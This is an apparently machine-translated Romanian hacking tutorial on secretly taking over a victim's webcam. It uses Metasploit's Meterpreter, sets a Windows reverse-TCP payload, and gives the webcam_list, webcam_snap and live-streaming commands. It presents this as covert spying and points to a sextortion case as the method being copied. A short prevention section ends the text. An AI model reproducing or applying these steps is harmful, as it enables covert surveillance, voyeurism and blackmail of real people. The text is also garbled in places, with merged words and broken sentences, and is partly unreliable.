în acest tutorial, vom arunca o privire la modul în care putem hack într-un webcam secret și de la distanță pe internet și să ia o privire la ceea ce se întâmplă la cealaltă parte. Vom folosi puternicul Meterpreter și Kali Linux pentru a intra în camera web a victimei. Vom prelua controlul complet al camerei web, îl vom porni, vom primi instantanee și chiar vom transmite videoclipuri live fără ca cineva să afle vreodată.
la începutul anului 2014, un hacker a fost condamnat la 18 luni pentru a face doar acest lucru la Miss Teen USA 2013. El a găsit o vulnerabilitate în computerul ei (ca un software învechit), a făcut câteva fotografii compromițătoare de pe Camera Web și a șantajat victima pentru a trimite mai multe fotografii. Metoda pe care a folosit-o este exact ceea ce vom încerca aici.
cel mai bun prieten al nostrumeterpreter ne va ajuta cu acest hack. Cu Meterpreter putem controla webcam cuiva, instalați un keylogger sau planta propriile virusuri, fura date private și de a face destul de mult nimic pe computerul victimei.
pentru acest tutorial, presupun că ați folosit deja un modul de atac pentru a exploata o vulnerabilitate folosind Metasploit (cum se face acest lucru ?). Acum să trecem la treabă.
cum să hack webcam-uri?
Pasul 1: Configurarea meterpreter.
după ce am exploatat cu succes victima, avem acum opțiunea de a seta o sarcină utilă la alegere. Sarcina utilă îi spune lui metasploit ce să facă pe computerul victimei odată ce intră. Meterpreter este sarcina noastră utilă. Următoarea comandă stabilește sarcina noastră utilă:
set payload windows/meterpreter/reverse_tcpdacă atacul a avut succes, metasploit instalează automat meterpreter pe sistemul țintă și putem trece la hacking Camera Web.
Pasul 2: Găsiți Camera Web.
Meterpreter are un modul încorporat pentru căutarea și controlul camerei web a sistemului la distanță. Putem începe prin a căuta dacă sistemul are chiar și o cameră web sau not.me. comanda de mai jos este folosită pentru asta, ne returnează și numele camerei web.
meterpreter > webcam_listși acum ar trebui să vedeți Camera Web a țintei dvs. listată în ieșire.
Pasul 3: Ia instantanee
dacă ultima comandă ne-a dat un webcam putem merge mai departe și fixați o fotografie:
meterpreter > webcam_snapși acum ar trebui să vedeți o imagine a fost salvat în folderul /opt/framework3/msf3 pur și simplu cap de acolo
4: Stream video în timp real de la webcam hacked
așa că am luat doar o fotografie, să vedem cum să obțineți un flux video live. Putem face acest lucru tastând comanda de mai jos: (Folosim –p parametru pentru a specifica directorul pe care dorim să-l dăm fișierului de streaming video)
meterpreter > run webcam -p /var/wwwaceastă comandă declanșează Camera Web a victimei și trimite ieșirea video la /var/www/webcam.htm. Puteți deschide acest fișier și puteți verifica ce se întâmplă la celălalt capăt într-un flux video live.
cum să preveniți hackingul propriei camere web?
există mai multe moduri de a hack în webcam-uri. În exemplul de mai sus, cu doar câteva comenzi mici, putem arunca o privire în camera web a victimei noastre. Orice expert în securitate experimentat vă va spune că niciun sistem nu este complet sigur. Acesta este motivul pentru care ar trebui să păstrați întotdeauna camerele acoperite atunci când nu sunt utilizate. Personal, folosesc acest mic gadget atât pe laptop, cât și pe smartphone.
dar asta nu înseamnă că nu ar trebui să vă deranjați să vă mențineți sistemul de operare și aplicațiile actualizate, dimpotrivă. Dacă un hacker poate obține controlul camerei dvs. web, sistemul dvs. a fost exploatat cu succes, este efectiv acum un bot, un sclav al atacatorului. Aceasta înseamnă că atacatorul poate face orice pe sistemul dvs.: accesați datele dvs. private, vedeți orice tastați, precum și toate site-urile web pe care le vizitați.
ce dispozitiv folosești acum? Un smartphone? Un laptop? Sunt șanse să te uiți direct la o cameră. Te simți brusc puțin neliniștit? Ar trebui. Nu – ți asuma riscuri. Dacă pur și simplu acoperi camerele de luat vederi și actualiza în mod obișnuit toate software-ul puteți evita fiind victima unui webcam hack-te.